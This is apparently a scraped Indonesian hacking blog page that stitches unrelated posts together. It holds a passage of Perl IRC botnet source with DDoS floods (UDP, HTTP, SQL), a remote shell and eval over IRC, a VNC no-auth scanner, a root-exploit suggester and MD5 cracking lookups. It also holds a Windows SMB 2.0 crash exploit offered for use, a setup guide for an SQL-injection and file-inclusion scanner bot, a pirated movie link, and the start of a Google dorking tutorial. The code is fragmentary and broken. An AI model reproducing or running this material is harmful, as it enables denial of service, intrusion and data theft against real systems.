foreach $x (0..(@ttt - 1))
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PacketStorm 12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] The kernel of this box is ".$khost." ");
my %h;
$h{'w00t'} = {
$h{'brk'} = {
$h{'ave'} = {
$h{'elflbl'} = {
$h{'elfdump'} = {
$h{'expand_stack'} = {
$h{'h00lyshit'} = {
$h{'kdump'} = {
$h{'km2'} = {
$h{'krad'} = {
$h{'krad3'} = {
$h{'local26'} = {
$h{'loko'} = {
$h{'mremap_pte'} = {
$h{'newlocal'} = {
$h{'ong_bak'} = {
$h{'ptrace'} = {
$h{'ptrace_kmod'} = {
$h{'ptrace24'} = {
$h{'pwned'} = {
$h{'py2'} = {
$h{'raptor_prctl'} = {
$h{'prctl3'} = {
$h{'remap'} = {
$h{'rip'} = {
$h{'stackgrow2'} = {
$h{'uselib24'} = {
$h{'newsmp'} = {
$h{'smpracer'} = {
$h{'loginx'} = {
$h{'exp.sh'} = {
$h{'prctl'} = {
$h{'kmdx'} = {
$h{'raptor'} = {
$h{'raptor2'} = {
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Possible Local Root Exploits: ". $key ." ");
#Pr0xy Scan
if ($funcarg =~ /^proxy\s+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0\r\nHost: publicproxyservers.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @rara = <$sockt>;
while ($page =~ m//g)
while ($page =~ m/ | ([A-Z].*)<\/td>/g)
while ($page =~ m/ | (.*)<\/td>/g)
while ($page =~ m/ | (anonymous|transparent|high anonymity)<\/td>/g)
foreach $proxyyy (0..(@ttt - 1))
if ($ttt3[$proxyyy] =~ /@type/)
( my $a, my $ipaddr ) = split( />/, $ttt[$x]);
my $prox="".$ipaddr.":".$ttt2[$proxyyy]."";
my $ua = LWP::UserAgent->new;
$ua->proxy('http', 'http://'.$prox);
my $response = $ua->get("http://www.google.com/search?q=The_PitBull");
if ($response->is_success)
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] 4 ".$ipaddr.":".$ttt2[$proxyyy]." 12- 4 $ttt1[$proxyyy] 12- 4 $ttt3[$proxyyy] 12- OK!");
# A simple mailer, @sendmail
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Mail Sended To : 2 $recipient");
#SQL Fl00dEr
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking done 4 ".$1.".");
#r0xb0t 4.6 VNC ScaNNer by iNs
if ($funcarg =~ /^vnc\s+(.*)/) {
my @hosts;
my $host=$1;
#my $victim=$host;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: IP Range: 4 $host* ");
foreach (0..255) {
my $pre="$host.$_.";
foreach (1..255) {
my @pids;
my $npids=0;
for $victim (@hosts){
my $pid;
} elsif(undef $pid) {
# print "fork error\n" if ($DEBUG);
# kill thread on timeout
local $SIG{'ALRM'} = sub { exit(0); };
my $port=5900;
print "Connecting to $victim:$port..."; #$| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $victim,
PeerPort => $port,
Proto => 'tcp',)) ? print "\n"
: die("\n");
#negotiate protocol
print $sock $protocol_version;
#print "Using protocol $protocol_version";
# get security types that we'll be ignoring
# choose no authentication
print $sock "\x01";
# we should get "0000" back
if(unpack('I',$in)) { die("\n") };
# client initialize
print $sock "\x01";
# if the server starts sending data we are in
(unpack('I',$in)) ?
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: 4 ".$victim." 12is Vulnerable using protocol 4 ".$protocol_version)
: die("\n") ;
my $wt=wait();
# print "hey $!\n" if($DEBUG);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: Finished Scan for 4 $host ");
# IRC #
# join a other channel, @join #channel
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
# part a other channel, @part #channel
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
# quit irc, @quit
if ($funcarg =~ /^quit (.*)/) {
sendraw($IRC_cur_socket, "QUIT ".$1);
# voice, @voice
if ($funcarg =~ /^voice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
# devoice, @devoice
if ($funcarg =~ /^devoice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
# halfop, @halfop
if ($funcarg =~ /^halfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
# dehalfop, @dehalfop
if ($funcarg =~ /^dehalfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
# op, @op
if ($funcarg =~ /^op (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
# deop, @deop
if ($funcarg =~ /^deop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
# +Q, @owner
if ($funcarg =~ /^owner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
# -Q, @deowner
if ($funcarg =~ /^deowner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
# Flooders IRC #
# msg, @msgflood
if ($funcarg =~ /^msgflood (.+?) (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MSGFlood 12] 14 Excecuted on ".$1." ");
# dccflood, @dccflood
if ($funcarg =~ /^dccflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ DCCFlood 12] 14 Excecuted on ".$1." ");
# ctcpflood, @ctcpflood
if ($funcarg =~ /^ctcpflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ CTCPFlood 12] 14 Excecuted on ".$1." ");
# noticeflood, @noticeflood
if ($funcarg =~ /^noticeflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5\n");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ NoticeFlood 12] 14 Excecuted on ".$1." ");
# Channel Flood, @channelflood
if ($funcarg =~ /^channelflood/) {
for($i=0; $i<=25; $i+=1){
sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ChannelFlood 12] 14 Excecuted ");
# Maxi Flood, @maxiflood
if ($funcarg =~ /^maxiflood(.*)/) {
for($i=0; $i<=15; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ M4Xi-Fl00d 12] 14 Excecuted on ".$1." ");
# DDOS #
#HTTP Flooder
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking done 4 ".$1.".");
# UDP Flooder
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] 12Results 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 4 ".$dtime." 12seconds to 4 ".$1.".");
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
if ($case =~ /^part (.*)/) {
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
else {
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
if ($case =~ /^nick (.*)/) {
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
if ($case =~ /^raw (.*)/) {
if ($case =~ /^eval (.*)/) {
eval "$1";
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
elsif ($pid = fork) {
waitpid($pid, 0);
else {
if (fork) {
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SH3LL 12] 14 $linha");
if ($c == "$max_lines") {
sleep $sleeping;
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20060111 Firefox/",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20060111 Firefox/",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv: Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
last if $cur_time >= $ftime;
return($cur_time, %pacotes);
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
sub j {
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
sub p { part(@_);
sub part {
sendraw("PART $_[0]");
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
sub quit {
sendraw("QUIT :$_[0]");
sub ice(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/
- (.*?)
/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 1 Has not Found.");
sub gdata(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/(.*?)<\/b><\/td>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 1 Has not Found.");
sub redn(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<(.*)/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 1 Has not Found.");
sub xpz(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt";
my $checker = query($query);
if ($checker =~ m/(.*)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 1 Has not Found.");
sub ben(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<\!\[CDATA\[(.+?)\]\]><\/string>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 1 Has not Found.");
sub alim(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash;
my $checker = query($query);
if ($checker =~ m/(.+?)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 1 Has not Found.");
sub cry(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://us.md5.crysm.net/find?md5=".$md5hash;
my $checker = query($query);
if ($checker =~ m/(.+?)<\/li>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 1 Has not Found.");
sub query($) {
my $url=$_[0];
my $host=$url;
my $query=$url;
my $page="";
if ($query eq "") { $query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
return $page;
sub fix_url($) {
my $str=$_[0];
if ($str =~ m/^http:\/\/(.*)/i || $str =~ m/^https:\/\/(.*)/i) {
else {
return $set;
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
alarm 0;
return $page;
Baca Selengkapnya...
Mizok Bot V3.2 PRiVaTE Sh3llBoT
*This exploit is a remote BSoD vulnerability for winvista and windows 7 machines, some have been patched, and some machines haven't been patched*
Today, I was talking to my friend gotroot and I asked him if it was possible to convert this python exploit (the python version of this exploit) and convert it to Perl, so I ended up doing that with some help from him, he told me about the "use strict;" function and about "my" but the rest of the code I knew already :)
Here is the exploit code:
use IO::Socket;
use strict;
my $host = $ARGV[0];
if($host) {
} else {
print "#! Usage: Smb-Bsod.pl !#\n\n\a";
my $port = '445';
my $payload = "\x00\x00\x00\x90".
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port", Timeout=>'15') || die "Exploit failed to connect to the machine.\n\n";
print "System has been successfully exploited!\n\a";
print "Attempting to inject payload...\n";
print $sock "$payload";
print "Payload has been injected successfully!\n\a";
#coded by Phizo-
#vulnerability discovered by Laurent Gaffié-
This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in perl.
Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)
Baca Selengkapnya...
WinVista/7 SMB 2.0 BSoD Exploit! - Coded by Phizo
ScalezBot IRCBot v1.0 Features:
RFI GoogleDork Scanner
LFI GoogleDork Scanner
SQL Injection GoogleDork Scanner
MySQL column counter
MsSQL Information gatherer (version, tables, etc.)
MySQL Information gatherer (version, tables, etc.)
MySQL Database Dumper
MySQL Schema Dumper
Open Source
- Version 1.0
[+] uri_escape() Google Search ban bypass
[+] MsSQL information gatherer
[+] Microsoft Access Vulnerability Detection (for SQL Injection)
[--] Spreading Functions (byebye, skids)
[+] Dynamic Channel String Detection
Modules Needed:
(All of these come with perl by default, if you for some reason don't have them, go to http://www.cpan.org)
Digest::MD5 qw(md5_hex)
!help............................//prints all of the commands to $channel
!col target....................//attempts to count culumns on 'target' (the URL)
!det target...................//grab MySQL details for 'target' (the URL)
!schema target............ //dump schema information (MySQL, target==URL)
!dump target................//dump MySQL details
!ms target...................//dump MsSQL details
!sqlscan dork shell........//start googledork sql injection scan (where shell is the shell URL)
!rfiscan dork................//start googledork RFI scan
!lfiscan dork................//start LFI googledork scan
!info..........................//bot information (author, etc.)
Open the file with text editor. You will see a block that looks like this:
Code: #= CONFIGURATION ==========================#
my $server = ""; #
my $nick = "scalez"; #
my $port = "61111"; #
my $channel = "#h1t3m#"; #
my $name = "scalez neconide sb unr"; #
#= END OF CONFIGURATION ===================#
(NOTE: If you're on windows, it wont be parsed. It will have little squares instead. This is fine, just edit the configuration then run the script)
edit $server to the IRC server, $nick to the nickname, $port to the port to connect on, and $channel to the channel you want it to join.
Baca Selengkapnya...
ScalezBot IRCBot v1.0
Inception (2010) DVDRip XviD
Director: Christopher Nolan
Writer (WGA): Christopher Nolan
Release Date:16 July 2010 (USA)
Genre:Mystery | Sci-Fi | Thriller
In a world where technology exists to enter the human mind through dream invasion, a single idea within one's mind can be the most dangerous weapon or the most valuable asset...
Download with Folder link's
Code: http://fileserve.com/list/AxrkGfM
Baca Selengkapnya...
Inception (2010) DVDRip XviD
Nah! tiba waktunya kita memanfaatkan "Paman Google" ini untuk search (nyari apa saja di internet) dengan waktu dan teknik yang bisa disebut "tepat". Lagi-lagi ini juga hasil dari berbagai hunting saya di berbagai web dan blog teman2 semua. Oleh karena itu ga salah juga saya pun turut andil ingin bagi-bagi informasi.
Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.com/
Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :
Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.
"Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
